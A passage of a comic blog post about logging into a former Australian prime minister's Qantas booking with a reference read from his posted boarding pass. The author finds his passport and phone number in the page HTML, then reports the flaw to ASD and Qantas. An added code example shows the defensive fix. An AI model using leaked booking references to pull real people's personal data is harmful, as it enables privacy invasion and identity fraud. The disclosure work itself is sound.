<p>Well, the login form was just… <em>there</em>, and it was asking for a Booking Reference and a last name. I had just flawlessly read the Booking Reference from the boarding pass picture, and, well… I knew the last name<sup id="fnref:lastname" role="doc-noteref"><a href="#fn:lastname" class="footnote" rel="footnote">7</a></sup>.</p>
<p>I did hesitate for a split-second, but… no, I had to know.</p>
<h3 id="step-5-crimes">Step 5: Crimes(?)</h3>
<video class="sunburntcountry" controls="" preload="auto">
<source src="/img/sunburnt-country/youngman.mp4" type="video/mp4" />
<img src="/img/sunburnt-country/summary.gif" />
</video>
<p style="text-align:center"><em>youngman.mp4</em></p>
<p><img src="/img/sunburnt-country/loggedin.png" alt="The logged in &quot;manage booking page&quot;" />
<em>The “Manage Booking” page, logged in as some guy called Anthony Abbott</em></p>
<h3 id="can-i-get-a-yikes-in-the-chat">Can I get a YIKES in the chat</h3>
<p>Leave a comment if you really felt that.</p>
<p><img src="/img/sunburnt-country/yikes.png" alt="yikes" /></p>
<p>I guess I was now logged the heck in as Tony Abbott? And for all I know, everyone else who saw his Instagram post was right there with me. It’s kinda wholesome, to imagine us all there together. But also probably suboptimal in a governmental sense.</p>
<h5 id="was-there-anything-secret-in-here">Was there anything secret in here?</h5>
<p>I then just incredibly browsed the page, browsed it so hard.</p>
<p>I saw Tony Abbott’s name<sup id="fnref:name" role="doc-noteref"><a href="#fn:name" class="footnote" rel="footnote">8</a></sup>, flight times, and Frequent Flyer number, but not really anything <em>super</em> secret-looking. Not gonna be committing any cyber treason with a Frequent Flyer number. The flight was in the past, so I couldn’t change anything, either.</p>
<p>The page said the flight had been booked by a travel agent, so I guessed some information would be missing because of that.</p>
<p>I clicked around and scrolled a considerable length, but still didn’t find any government secrets.</p>
<p>Some people might give up here. But I, the Icarus of computers, was simply too dumb to know when to stop.</p>
<h3 id="were-not-done-just-because-a-web-page-says-were-done">We’re not done just because a <em>web page</em> says we’re done</h3>
<p>I wanted to see if there were juicy things hidden <em>inside</em> the page. To do it, I had to use the <em>only</em> hacker tool I know.</p>
<p><img src="/img/sunburnt-country/inspectelement.png" alt="Right click > Inspect-small" />
<em>Right click > Inspect Element, all you need to subvert the Commonwealth of Australia</em></p>
<p>Listen. This is the only part of the story that might be confused for highly elite computer skill. It’s not, though. Maybe later someone will show you this same thing to try and flex, acting like only <em>they</em> know how to do it. You will not go gently into that good night. You will refuse to acknowledge their flex, killing them instantly.</p>
<h5 id="how-does-inspect-element-work">How does “Inspect Element” work?</h5>
<p>“Inspect Element”, as it’s called, is a feature of Google Chrome that lets you see the computer’s internal representation (HTML) of the page you’re looking at. Kinda like opening up a clock and looking at the cool cog party inside.</p>
<p><img src="https://upload.wikimedia.org/wikipedia/commons/6/67/Pocketwatch_cutaway_drawing.jpg" alt="cog party|small" />
<em>Yeahhh go little cogs, look at ‘em absolutely going off. Now imagine this but with like, JavaScript</em></p>
<p>Everything you see when you use “Inspect Element” was already downloaded to your computer, you just hadn’t asked Chrome to show it to you yet. Just like how the cogs were already in the watch, you just hadn’t opened it up to look.</p>
<p>But let us dispense with frivolous cog talk. Cheap tricks such as “Inspect Element” are used by programmers to try and understand how the website works. This is ultimately futile: Nobody can understand how websites work. Unfortunately, it kinda <em>looks</em> like hacking the first time you see it.</p>
<p>If you’d like to know more about it, I’ve prepared a short video.</p>
<blockquote class="twitter-tweet"><p lang="en" dir="ltr">hey youtube welcome to my hacking tutorial, today we're gonna hack.... the nsa <a href="https://t.co/2Z35GJjSZE">pic.twitter.com/2Z35GJjSZE</a></p>— “Alex” (@mangopdf) <a href="https://twitter.com/mangopdf/status/1123400764926226432?ref_src=twsrc%5Etfw">May 1, 2019</a></blockquote>
<h3 id="browsing-the-manage-booking-pages-html">Browsing the “Manage Booking” page’s HTML</h3>
<p>I scrolled around the page’s HTML, not really knowing what it meant, furiously trying to find anything that looked out of place or secret.</p>
<p>I eventually realised that manually reading HTML with my eyes was not an efficient way of defending my country, and Ctrl + F’d the HTML for “passport”.</p>
<h3 id="oh-no">oh no</h3>
<p><img src="/img/sunburnt-country/passportjson.gif" alt="Blurred screenshot of close up &quot;passport&quot; number" /></p>
<h3 id="oh-yes">Oh yes</h3>
<p>It’s just <em>there</em>.</p>
<p>At this point I was fairly sure I was looking at the <em>extremely</em> secret government-issued ID of the <em>28th Prime Minister of the Commonwealth of Australia, servant to her Majesty Queen Elizabeth II</em> and I was <em>kinda</em> worried that I was somehow doing something wrong, but like, not enough to stop.</p>
<h3 id="anything-else-in-this-page">….anything <em>else</em> in this page?</h3>
<p>Well damn, if Tony Abbott’s passport number is in this treasure trove of computer spaghetti, maybe there’s wayyyyy more. Perhaps this HTML contains the lost launch codes to the Sydney Opera House, or Harold Holt<sup id="fnref:holt" role="doc-noteref"><a href="#fn:holt" class="footnote" rel="footnote">9</a></sup>.</p>
<p>Maybe there’s a phone number?</p>
<p>Searching for <code class="language-plaintext highlighter-rouge">phone</code> and <code class="language-plaintext highlighter-rouge">number</code> didn’t get anywhere, so I searched for <code class="language-plaintext highlighter-rouge">614</code>, the first 3 digits of an Australian phone number, using my colossal and highly celestial galaxy brain.</p>
<h5 id="weird-uppercase-letters">Weird uppercase letters</h5>
<p>A weird pile of what I could only describe as extremely uppercase letters came up. It looked like this:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>RQST QF HK1 HNDSYD/03EN|FQTV QF HK1|CTCM QF HK1 614[phone number]|CKIN QF HN1 DO NOT SEAT ROW [row number] PLS SEAT LAST ROW OF [row letter] WINDOW
</code></pre></div></div>
<p>So, there’s a lot going on here. There is indeed a phone number in here. But what the heck is all this <em>other</em> stuff?</p>
<p>I realised this was like… Qantas staff talking to each other <em>about</em> Tony Abbott, but not <em>to</em> him?</p>
<p>In what is surely the subtweeting of the century, it has a section saying <code class="language-plaintext highlighter-rouge">HITOMI CALLED RQSTING FASTTRACK FOR MR. ABBOTT</code>. Hitomi must be requesting a “fasttrack” (I thought that was only a thing in movies???) from another Qantas employee.</p>
<h5 id="this-is-messed-up-for-many-reasons">This is messed up for many reasons</h5>
<p>What is even going on here? Why do Qantas flight staff talk to each other via this passenger information field? Why do they send these messages, and your passport number, <em>to</em> you when you log in to their website? I’ll never know because I suddenly got distracted with</p>
<h3 id="forbidden-airline-code">Forbidden airline code</h3>
<p>I realised the allcaps muesli I saw must be some airline code for something. Furious and intense googling led me to several ancient forbidden PDFs that explained some of the codes.</p>
<p>Apparently, they’re called “SSR codes” (Special Service Request). There are codes for things like “Vegetarian lacto-ovo meal” (<code class="language-plaintext highlighter-rouge">VLML</code>), “Vegetarian oriental meal” (<code class="language-plaintext highlighter-rouge">VOML</code>), and even “Vegetarian vegan meal” (<code class="language-plaintext highlighter-rouge">VGML</code>). Because I was curious about these codes, here’s some for you to be curious about too (tag urself, I’m <code class="language-plaintext highlighter-rouge">UMNR</code>):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>RFTV Reason for Travel
UMNR Unaccompanied minor
PDCO Carbon Offset (chargeable)
WEAP Weapon
DEPA Deportee—accompanied by an escort
ESAN Passenger with Emotional Support Animal in Cabin
</code></pre></div></div>
<p>The phone number I found looked like this: <code class="language-plaintext highlighter-rouge">CTCM QF HK1 [phone number]</code>. Googling “SSR CTCM” led me to the <a href="https://guides.developer.iata.org/docs/ctcm">developer guide</a> for some kind of airline association, which I assume I am basically a member of now.</p>
<p><img src="/img/sunburnt-country/ctcm.png" alt="CTCM|medium" />
<em><code class="language-plaintext highlighter-rouge">CTCM QF HK1</code> translates as “Contact phone number of passenger 1”</em></p>
<h4 id="is-the-phone-number-actually-his">Is the phone number actually his?</h4>
<p>I thought maybe the phone number belonged to the travel agency, but I <a href="https://portal.iata.org/faq/articles/en_US/FAQ/Is-it-mandatory-for-travel-agents-to-provide-the-passenger-s-mobile-phone-and-email-address-1448977338174">checked</a> and it has to be the passenger’s real phone number. That would be, if my calculations are correct,,,, *steeples fingers* Tony Abbott’s phone number.</p>
<h2 id="what-have-i-done">what have i done</h2>
<p>I’d now found Tony Abbott’s:</p>
<ul>
<li>Passport details</li>
<li>Phone number</li>
<li>Weird Qantas staff comments.</li>
</ul>
<p>My friend who messaged me had <em>no idea</em>.</p>
<p>Tony Abbott’s passport is probably a <a href="https://en.wikipedia.org/wiki/Australian_passport#Diplomatic_and_Official_Passport">Diplomatic passport</a>, which is used to “represent the Australian Government overseas in an official capacity”.</p>
<h2 id="what-have-i-done-1">what have i <em>done</em></h2>
<p>By this point I’d had enough defending my country, and had recently noticed some new thoughts in my brain<sup id="fnref:brain" role="doc-noteref"><a href="#fn:brain" class="footnote" rel="footnote">10</a></sup>, which were:</p>
<ul>
<li><em>oh jeez oh boy oh jeez</em></li>
<li><em>i gotta get someone, somehow, to reset tony abbott’s passport number</em></li>
<li><em>can you even reset passport numbers</em></li>
<li><em>is it possible that i’ve done a crime</em></li>
</ul>
<hr />
<h1 id="intermission">Intermission</h1>
<p><img src="/img/sunburnt-country/intermission.jpg" alt="anime is real" /></p>
<hr />
<h1 id="act-2-do-not-get-arrested-challenge-2020">Act 2: Do not get arrested challenge 2020</h1>
<blockquote>
<p>In this act, I, your well-meaning but ultimately incompetent protagonist, attempt to do the following things:</p>
</blockquote>
<ul>
<li>⬜ figure out whether i have done a crime</li>
<li>⬜ notify someone (tony abbott?) that this happened</li>
<li>⬜ get permission to publish this here blog post</li>
<li>⬜ tell qantas about the security issue so they can fix it</li>
</ul>
<blockquote>
<p>Spoilers: This takes almost six months.</p>
</blockquote>
<hr />
<h4 id="lets-skip-the-boring-bits">Let’s skip the boring bits</h4>
<p>I contacted a <em>lot</em> of people about this. If my calculations are correct<sup id="fnref:calculations" role="doc-noteref"><a href="#fn:calculations" class="footnote" rel="footnote">11</a></sup>, I called at least 30 phone numbers, to say nothing of The Emails. If you laid all the people I contacted end to end along the equator, they would die, and you would be arrested. Eventually I started keeping track of who I talked to in a note I now refer to as “the hashtag struggle”.</p>
<p>I’m gonna skip a considerable volume of tedious and ultimately unsatisfying telephony, because it’s been a long day of scrolling already, and you need to save your strength.</p>
<p>Alright strap yourself in and enjoy as I am drop-kicked through the goal posts of life.</p>
<hr />
<h2 id="part-1-is-it-possible-that-ive-done-a-crime">Part 1: is it possible that i’ve done a crime</h2>
<p>I didn’t <em>think</em> anything I did sounded like a crime, but I knew that sometimes when the other person is rich or famous, things can suddenly <em>become</em> crimes. Like, was there going to be some Monarch Law or something? Was Queen Elizabeth II gonna be mad about this?</p>
<p>My usual defence against being arrested for hacking is making sure the person being hacked is okay with it. You heard me, it’s the power of ✨consent✨. But this time I could uh only get it in retrospect, which is a bit yikes.</p>
<p>So I was wondering like… was logging in with someone else’s booking reference a crime? Was <em>having</em> someone else’s passport number a crime? What if they were, say, the former Prime Minister? Would I get in trouble for publishing a blog post about it? I mean you’re reading the blog post right now so obviousl</p>
<p>Update: I have been arrested.</p>
<h3 id="just-straight-up-reading-the-law">Just straight up Reading The Law</h3>
<p>It turned out I could just google these things, and before I knew it I was reading “the legislation”. It’s the rules of the law, just written down.</p>
<p>Look, reading pages of HTML? No worries. Especially if it’s to defend my country. But whoever wrote the legislation was just making up words.</p>
<p>Eventually, I was able to divine the following wisdoms from the Times New Roman tea leaves:</p>
<ul>
<li>Defamation is where you get in trouble for publishing something that makes someone look bad.
<ul>
<li>But, it’s fine for me to blog about it, since it’s not defamation if you can prove it’s <em>true</em></li>
</ul>
</li>
<li>Having Tony Abbott’s passport number isn’t a crime
<ul>
<li>But using it to commit identity fraud would be</li>
</ul>
</li>
<li>There are laws about what it’s okay to do on a computer
<ul>
<li>The things it’s okay to do are: If u EVER even LOOK at a computer the wrong way, the FBI will instantly slam dunk you in a legal fashion dependent on the legislation in your area</li>
</ul>
</li>
</ul>
<p>I am possibly the furthest thing you can be from a lawyer. So, I’m sure I don’t need to tell you not to take this as legal advice. But, if you <em>are</em> the kind of person who takes legal advice from mango blog posts, who am I to stand in your way? Not a lawyer, that’s who. Don’t do it.</p>
<p>You know what, maybe I needed help. From an adult. Someone whose 3-year old kid has been buying iPad apps for months because their parents can’t figure out how to turn it off.</p>
<p><em>“Yeah, maybe I should get some of that free government legal advice”</em>, I thought to myself, legally. That seemed like a pretty common thing, so I thought it should be easy to do. I took a big sip of water and googled “free legal advice”.</p>
<h3 id="trying-to-ask-a-lawyer-if-i-gone-and-done-a-crime">trying to ask a lawyer if i gone and done a crime</h3>
<p>Before I went and told everyone about my HTML frolicking, I spent a week calling legal aid numbers, lawyers, and otherwise trying to figure out if I’d done a crime<sup id="fnref:noplan" role="doc-noteref"><a href="#fn:noplan" class="footnote" rel="footnote">12</a></sup>.</p>
<p>During this time, I didn’t tell <em>anyone</em> what I’d done. I asked if any laws would be broken if “someone” had “logged into a website with someone’s publicly-posted password and found the personal information of a former politician”. Do you see how that’s not even a lie? I’m starting to see how lawyers do it.</p>
<h4 id="calling-legal-aid-places">Calling Legal Aid places</h4>
<p>First I call the state government’s Legal Aid number.
They tell me they don’t <em>do that</em> here, and I should call another Legal Aid place named something slightly different.</p>
<p>The second place tells me they don’t <em>do that</em> either, and I should call the First Place and “hopefully you get someone more senior”.</p>
<p>I call the First Place again, and they say “oh you’ve been given the run around!”. You see where this is going.</p>
<p>Let’s skip a lot of phone calls. Take my hand as I whisk you towards the slightly-more-recent past. Based on advice I got from two independent lawyers that was definitely not legal advice: I haven’t done a crime.</p>
<p>Helllllll yeah. But I mean it’s a little late because I forgot to mention that by this point I had already emailed explicit details of my activities to the Australian Government.</p>
<hr />
<ul>
<li>☑️ figure out whether i have done a crime</li>
<li>⬜ notify someone (tony abbott?) that this happened</li>
<li>⬜ get permission to publish this here blog post</li>
<li>⬜ tell qantas about the security issue so they can fix it</li>
</ul>
<h2 id="part-2-trying-to-report-the-problem-to-someone-anyone-please">Part 2: trying to report the problem to someone, anyone, please</h2>
<p>I had Tony Abbott’s passport number, phone number, and weird Qantas messages about him. I was the only one who <em>knew</em> I had these.</p>
<p>Anyone who saw that Instagram post could also have them. I felt like I had to like, <em>tell</em> someone about this. Someone with like, responsibilities. Someone with an email signature.</p>
<h3 id="wait-but-do-u-see-the-irony-in-this-u-have-his-phone-number-right-there-so-u-could-just-">wait but do u see the irony in this, u have his phone number right there so u could just-</h3>
<p>Yes I see it thank u for pointing this out, wise, astute, and ultimately self-imposed heading. I <em>knew</em> I could just call the number any time and hear a “G’day” I’d <em>never</em> be able to forget. I knew I had a rare opportunity to call someone and have them ask “how did you get this number!?”.</p>
<p>But you can’t just <em>do</em> that.</p>
<p>You can’t just call someone’s phone number that you got by rummaging around in the HTML ball pit. Tony Abbott didn’t <em>want</em> me to have his phone number, because he didn’t give it to me. Maybe if it was urgent, or I had no other option, sure. But I was pretty sure I should do this the Nice way, and show that I come in peace.</p>
<p>I wanted to show that I come in peace because there’s also this pretty yikes thing that happens where you email someone being all like “henlo ur website let me log in with username <code class="language-plaintext highlighter-rouge">admin</code> and password <code class="language-plaintext highlighter-rouge">admin</code>, maybe u wanna change that??? could just be me but let me kno what u think xoxo alex” and then they reply being like “oh so you’re a HACKER and a CRIMINAL and you’ve HACKED ME AND MY FAMILY TOO and this is a RANSOM and ur from the DARK WEB i know what that is i’ve seen several episodes of mr robot WELL watch out kiddO bc me and my lawyers are bulk-installing tens of thousands of copies of <a href="https://www.mcafee.com/en-us/antivirus/gaming.html">McAfee® Gamer Security</a> as we speak, so i’d like 2 see u try”</p>
<h3 id="surely-you-just-contact-tony-abbott-officially">Surely you just contact Tony Abbott officially</h3>
<p>I googled “tony abbott contact”, but there’s only his <a href="https://tonyabbott.com.au">official website</a>. There’s no phone number on it, only a “contact me” form.</p>
<p><img src="/img/sunburnt-country/contact.png" alt="Contact me form|medium" />
<em>I imagine there have been some passionate opinions typed into this form at 9pm on a Tuesday</em></p>
<p>Yeah right, have you <em>seen</em> the incredible volume of #content people want to say at politicians? No way anyone’s reading that form.</p>
<p>I later decided to try anyway, using the same Inspect Element ritual from earlier. Looking at the network requests the page makes, I divined that the “Contact me” form just straight up does not work. When you click “submit”, you get an error, and nothing gets sent.</p>
<p><img src="/img/sunburnt-country/contact_us_403_error.png" alt="Contact us 403|" />
<em>This is an excellent way of using computers to solve the problem of “random people keep sending me angry letters”</em></p>
<p>Well rip I guess<sup id="fnref:underconstruction" role="doc-noteref"><a href="#fn:underconstruction" class="footnote" rel="footnote">13</a></sup>. I eventually realised the people to talk to were probably the government.</p>
<h2 id="the-government">The government</h2>
<p>It’s a big place.</p>
<p>In the beginning, humans developed the concept of language by banging rocks together and saying “oof, oog, and so on”. Then something went horribly wrong, and now people unironically begin every sentence with “in regards to”. Our story begins here.</p>
<p>The government has like fifty thousand million different departments, and they all know which acronyms to call each other, but you don’t. If you EVER call it DMP&amp;C instead of DPM&amp;C you are gonna be express email forwarded into a nightmare realm the likes of which cannot be expressed in <em>any</em> number of spreadsheet cells, in spite of all the good people they’ve lost trying.</p>
<p>I didn’t even know where to begin with this. Desperately, I called Tony Abbott’s former political party, who were all like</p>
<p><img src="/img/sunburnt-country/chess.png" alt="they were all like this-medium" /></p>
<p>Skip skip skip a few more calls like this.</p>
<h3 id="maybe-i-knew-someone-who-knew-someone">Maybe I knew someone who knew someone</h3>
<p><em>That’s</em> right, the true government channels were the friends we made along the way.</p>
<p>I asked hacker friends who seemed like they might know government security people. “Where do I report a security issue with like…. a person, not a website?”</p>
<p>They told me to call… 1300 CYBER1?</p>
<h3 id="1300-cyber1">1300 CYBER1</h3>
<p>I don’t really have a good explanation for this so I’m just gonna post the screenshots.</p>
<p><img src="/img/sunburnt-country/cyber11.png" alt="Screenshot of 1300 CYBER1 chat|small" />
<em>My friend showing me where to report a security issue with the government. I’m gonna need you to not ask any questions about the profile pictures.</em></p>
<p><img src="/img/sunburnt-country/cyber1website.png" alt="cyber1website" />
<em>Uhhh no wait I don’t wanna click any of these</em></p>
<p><img src="/img/sunburnt-country/cyber12.png" alt="Screenshot of 1300 CYBER1 chat second half|large" />
<em>The planet may be dying, but we live in a truly unparalleled age of content.</em></p>
<p>You <em>know</em> I smashed that call button on <code class="language-plaintext highlighter-rouge">1300 CYBER1</code>. Did they just make it <code class="language-plaintext highlighter-rouge">1300 CYBER</code> then realise you need one more digit for a phone number? Incredible.</p>
<h3 id="calling-1300-c-y-b-e-r-------o-n-e">Calling <code class="language-plaintext highlighter-rouge">1300 c y b e r o n e</code></h3>
<blockquote>
<p>“Yes yes hello, ring ring, is this 1300 cyber one”? They <em>have</em> to say yes if you ask that. They’re legally obligated.</p>
</blockquote>
<p>The person who picked up gave me an email address for <a href="https://www.asd.gov.au/">ASD</a> (the Australian flavour of America’s NSA), and told me to email them the details.</p>
<h3 id="emailing-the-government-my-crimes">Emailing the government my crimes</h3>
<p>Feeling like the digital equivalent of three kids in a trenchcoat, I broke out my best Government Email dialect and emailed ASD, asking for them to call me if they were the right place to tell about this.</p>
<p><img src="/img/sunburnt-country/asdemail.png" alt="ASD email|medium" />
<em>Sorry for the clickbait subject but well that’s what happened???</em></p>
<p>Fooled by my flawless disguise, they replied <em>instantly</em> (in a relative sense) asking for more details.</p>
<p><img src="/img/sunburnt-country/asdreply.png" alt="ASD reply|medium" />
<em>“Potential” exposure, yeah okay. At least the subject line had “[SEC=Sensitive]” in it so I </em>knew<em> I’d made it big</em></p>
<p>I <em>absolutely</em> could provide them with more information, so I did, because I love to cooperate with the Australian government.</p>
<p>I also asked whether they could give me permission to publish this blog post, and they were all like “Seen 2:35pm”. Eventually, after another big day of getting left on read by the government, they replied, being all like “thanks kiddO, we’re doing like, an <em>investigation</em> and stuff, so we’ll take it from here”.</p>
<p>Overall, ASD were really nice to me about it and happy that I’d helped. They encouraged me to report this kind of thing to them if it happened again, but I’m not really in the business of uhhhhhhhh whatever the heck this is.</p>
<p>By the way, at this point in the story (chronologically) I had <em>no</em> idea if what I was emailing the government was actually the confession to a crime, since I hadn’t talked to a lawyer yet. This is widely regarded as a bad move. I do not recommend anyone else use “but I’m being so helpful and earnest!!!” as a legal defence. But also I’m not a lawyer, so idk, maybe it works?</p>
<h3 id="wholesomely-emailing-the-government">Wholesomely emailing the government</h3>
<p>At one point in what was surely an unforgettable email chain, the person I was emailing added a P.S. containing…. the answer to the puzzle hidden on this website. The one you’re reading this blog on right now. Hello.
I guess they must have found this website (hi asd) by stalking the email address I was sending from. This is unprecedented and everything, but:</p>
<ol>
<li>The puzzle says to <a href="https://twitter.com/mangopdf">tweet</a> the answer at me, not email me</li>
<li>The prize for doing the puzzle is me tweeting this gif of a shakas to you<sup id="fnref:prize" role="doc-noteref"><a href="#fn:prize" class="footnote" rel="footnote">14</a></sup></li>
</ol>
<p><img src="https://media.giphy.com/media/13JoHhCFtUMAZa/giphy.gif" alt="shakas.gif|tiny" />
<em>yeahhhhhhhhhh, nice</em></p>
<p>So I guess I emailed the shakas gif to the government??? Yeah, I guess I did.</p>
<p><img src="/img/sunburnt-country/shakas_attached.png" alt="shakas attached dw" />
<em>Please find attached</em></p>
<h4 id="can-i-write-about-this">Can I write about this?</h4>
<p>I asked them if they could give me permission to write this blog post, or who to ask, and they were like “uhhhhhhhhhhh” and gave me two government media email addresses to try. Listen I don’t wanna be an “ummm they didn’t reply to my emAiLs” kinda person buT they simply left me no choice.</p>
<p>Still, defending the Commonwealth was in ASD’s hands now, and that’s a win for me at this point.</p>
<hr />
<ul>
<li>☑️ figure out whether i have done a crime</li>
<li>☑️ notify someone (The Government) that this happened</li>
<li>⬜ get permission to publish this here blog post</li>
<li>⬜ tell qantas about the security issue so they can fix it</li>
</ul>
<h2 id="part-3-telling-qantas-the-bad-news">Part 3: Telling Qantas the bad news</h2>
<h3 id="the-security-issue">The security issue</h3>
<p>Hey remember like fifteen minutes ago when this post was about webpages?</p>
<p>I’m guessing Qantas didn’t <em>want</em> to send the customer their passport number, phone number, and staff comments about them, so I wanted to let them know their website was doing that. Maybe the website was well-meaning, but ultimately caused more harm than good, like that time the bike path railings on the Golden Gate Bridge accidentally <a href="https://www.theguardian.com/us-news/2020/jun/06/golden-gate-bridge-san-francisco-sings">turned it into the world’s largest harmonica</a>.</p>
<h4 id="unblending-the-smoothie">Unblending the smoothie</h4>
<p>But why does the website even send you all that stuff in the first place? I don’t know, but to speculate wildly: maybe the website just sends your browser <em>all</em> the data it knows about you, and then only displays your name, flight times, etc., while leaving the passport number and the rest sitting in the page, where anyone with <code class="language-plaintext highlighter-rouge">right click &gt; Inspect Element</code> can read it.</p>
<p>If that were true, then Qantas would want to unblend the digital smoothie they’ve sent you, if you will. They’d want to change it so that the server only sends you your name and flight times and stuff (which are a key ingredient of the smoothie to be sure), not the whole identity fraud smoothie. Hiding the extra fields on the page isn’t enough: whatever is in the response is there for anyone who looks, no matter what the page chooses to draw on screen.</p>
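<p>Here is the smoothie thing as code, as an added example that is not Qantas’s, Amadeus’s, or the original post’s code. The booking record, its field names and its values are all made up for illustration (only <code class="language-plaintext highlighter-rouge">documentNumber</code> and the idea of internal PNR remarks come from the post). The first renderer embeds the whole record in the page and lets the page pick out what to display; the second builds a view model on the server with only the fields the page renders, so the passport number never reaches the browser at all. The last function is the check the post describes doing by hand: grep the response for field names that should never be in it.</p>

```javascript
// Added example, not code from Qantas, Amadeus or the original post.
// The booking shape and all values below are constructed for illustration.

// Constructed sample record, in the shape a booking system might hand
// to a web front end. Every value here is made up.
const sampleBooking = {
  pnr: "ABC123",
  passengers: [
    {
      firstName: "Jane",
      lastName: "Citizen",
      documentNumber: "PA1234567", // passport number (assumed field name, from the post)
      phone: "+61400000000",
    },
  ],
  segments: [
    { flightNumber: "QF1", from: "SYD", to: "MEL",
      departs: "2020-03-22T10:00", arrives: "2020-03-22T12:00" },
  ],
  remarks: ["INTERNAL STAFF COMMENT ABOUT PAX"], // PNR remarks (assumed field name)
};

// The "smoothie": the entire record is serialised into the page as JSON and
// the page's own JavaScript picks out the name and flight times to show.
// Everything else is still in the HTML for anyone who opens Inspect Element.
function renderSmoothie(booking) {
  return `<script>window.__BOOKING__ = ${JSON.stringify(booking)};</script>`;
}

// The "unblended" version: project the record down to exactly the fields the
// customer page renders. Sensitive fields are never serialised, so no amount
// of client-side hiding or un-hiding can expose them.
function projectForCustomer(booking) {
  return {
    passengers: booking.passengers.map((p) => ({
      firstName: p.firstName,
      lastName: p.lastName,
    })),
    segments: booking.segments.map((s) => ({
      flightNumber: s.flightNumber,
      from: s.from,
      to: s.to,
      departs: s.departs,
      arrives: s.arrives,
    })),
  };
}

function renderUnblended(booking) {
  // Note: embedding JSON inside <script> also needs "</" escaped in real code;
  // omitted here because the constructed sample contains none.
  return `<script>window.__BOOKING__ = ${JSON.stringify(projectForCustomer(booking))};</script>`;
}

// A response-level check: which fields that must never reach the browser
// appear anywhere in the rendered HTML? This is the "search the response for
// documentNumber" test from the post, generalised to a list of field names.
const SENSITIVE_KEYS = ["documentNumber", "phone", "remarks"];

function leakedFields(html) {
  return SENSITIVE_KEYS.filter((key) => html.includes(`"${key}"`));
}

// Stand-alone demo: the leaky page mentions all three fields, the fixed one none.
console.log("smoothie leaks:", leakedFields(renderSmoothie(sampleBooking)));
console.log("unblended leaks:", leakedFields(renderUnblended(sampleBooking)));
```

<p>The important bit is <em>where</em> the filtering happens. <code class="language-plaintext highlighter-rouge">projectForCustomer</code> runs before serialisation, so the passport number is absent from the response, not merely undrawn. Checking responses with something like <code class="language-plaintext highlighter-rouge">leakedFields</code> only tells you a known field name is gone, though; a renamed field or the same data embedded elsewhere would slip past it, which is why “I couldn’t see it anymore” is evidence rather than proof.</p>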
<h3 id="smoothie-evangelism">Smoothie evangelism</h3>
<p>I wanted to tell them the smoothie thing, but how do I contact them?</p>
<p>The first place to check is usually <code class="language-plaintext highlighter-rouge">company.com/security</code>, maybe that’ll w-</p>
<p><img src="/img/sunburnt-country/qantas_security_not_found.png" alt="qantas security not found|small" />
<em>Okay nevermind</em></p>
<p>Okay fine maybe I should just email <code class="language-plaintext highlighter-rouge">security@qantas.com.au</code> surely that’s it? I could only find a phone number to report security problems to, and I wasn’t sure if it was like…. airport security?</p>
<p>So I just… called the number and was like “heyyyy uhhhh I’d like to report a cyber security issue?”, and the person was like “yyyyya just email security@qantas.com.au” and i was like “ok sorrY”.</p>
<h3 id="time-to-email-qantas-i-guess">Time to email Qantas I guess</h3>
<p>I emailed Qantas, being like “beep boop here is how the computer problem works”.</p>
<p><img src="/img/sunburnt-country/qantasemail.png" alt="Email to Qantas security-medium" /></p>
<p>(Have you been wondering about the little dots in this post? Click this one for the rest of the email <sup id="fnref:qantasemail" role="doc-noteref"><a href="#fn:qantasemail" class="footnote" rel="footnote">15</a></sup>.)</p>
<p>A few days later, I got this reply.</p>
<p><img src="/img/sunburnt-country/qantasreply.png" alt="Reply from Qantas security-medium" /></p>
<h3 id="and-then-i-never-heard-from-this-person-again">And then I never heard from this person again</h3>
<p>Airlines were going through kinda a <em>struggle</em> at the time, so I guess that’s what happened?</p>
<p><img src="/img/sunburnt-country/qantasreplybutdumb.png" alt="pls|medium" />
<em>if ur still out there Shr Security i miss u</em></p>
<h3 id="struggles">Struggles</h3>
<p>After filling up my “get left on read” combo meter, I desperately resorted to calling Qantas’ secret media hotline number<sup id="fnref:spam" role="doc-noteref"><a href="#fn:spam" class="footnote" rel="footnote">16</a></sup>.</p>
<p>They said the issue was being fixed by <a href="https://en.wikipedia.org/wiki/Amadeus_CRS">Amadeus</a>, the company who makes their booking software, rather than with Qantas itself. I’m not sure if that means other Amadeus customers were also affected, or if it was just the way Qantas was using their software, or what.</p>
<p>It’s common to give companies 90 days to fix the bug before you publicly disclose it. It’s a tradeoff between giving them enough time to fix it, and the risk of people being hacked through the bug for as long as it stays unfixed and unknown to the public.</p>
<p>But, well, this was kinda a special case. Qantas was going through some #struggles, so it was taking longer. Lots of their staff were stood down, and the world was just generally more cooked. At the same time, hardly anybody was flying at the time, due to see above re: #struggles. So, I gave Qantas as much time as they needed.</p>
<h3 id="five-months-later">Five months later</h3>
<p>The world is a completely different place, and Qantas replies to me, saying they fixed the bug.
It <em>did</em> take five months, which is why it took so long for you and I to be having this weird textual interaction right now.</p>
<p>I don’t have a valid Booking Reference, so I can’t actually check what’s changed. I asked a friend to check (with an expired Booking Reference), and they said they didn’t see a mention of “documentNumber” anymore, which sounds like the passport number is no longer there. But That’s Not Science, so I don’t know for sure.</p>
<p>I originally found the bug in March, which was about 60 years ago. BUT we got there baybee, Qantas emailed me saying the bug had been fixed on August 21. They later told me they actually fixed the bug in July, but the person I was talking to didn’t know about it until August.</p>
<p>Qantas also said this when I asked them to review this post:</p>
<blockquote>
<p>Thanks again for letting us have the opportunity to review and again for refraining from posting until the fix was in place for vulnerability.</p>
</blockquote>
<blockquote>
<p>Our standard advice to customers is not to post pictures of the boarding pass, or to at least obscure the key personal information if they do, because of the detail it contains.</p>
</blockquote>
<blockquote>
<p>We appreciate you bringing it to our attention in such a responsible way, so we could fix the issue, which we did a few months ago now.</p>
</blockquote>
<p>I couldn’t find any advice on their website about not posting pictures of customer boarding passes, only news articles about how <a href="https://www.escape.com.au/news/big-change-coming-to-your-qantas-boarding-pass/news-story/1946086dcb3dab1ef614af6322b2585f">Qantas stopped printing the Frequent Flyer number on the boarding pass</a> last year, because… well, you can see why.</p>
<p>I also asked Qantas what they did to fix the bug, and they said:</p>
<blockquote>
<p>Unfortunately we’re not able to provide the details of fix as it is part of the protection of personal information.</p>
</blockquote>
<p>:((</p>
<hr />
<ul>
<li>☑️ figure out whether i have done a crime</li>
<li>☑️ notify someone (The Government) that this happened</li>
<li>⬜ get permission to publish this here blog post</li>
<li>☑️ tell qantas about the security issue so they can fix it</li>
</ul>
<h2 id="part-4-finding-tony-abbott">Part 4: Finding Tony Abbott</h2>
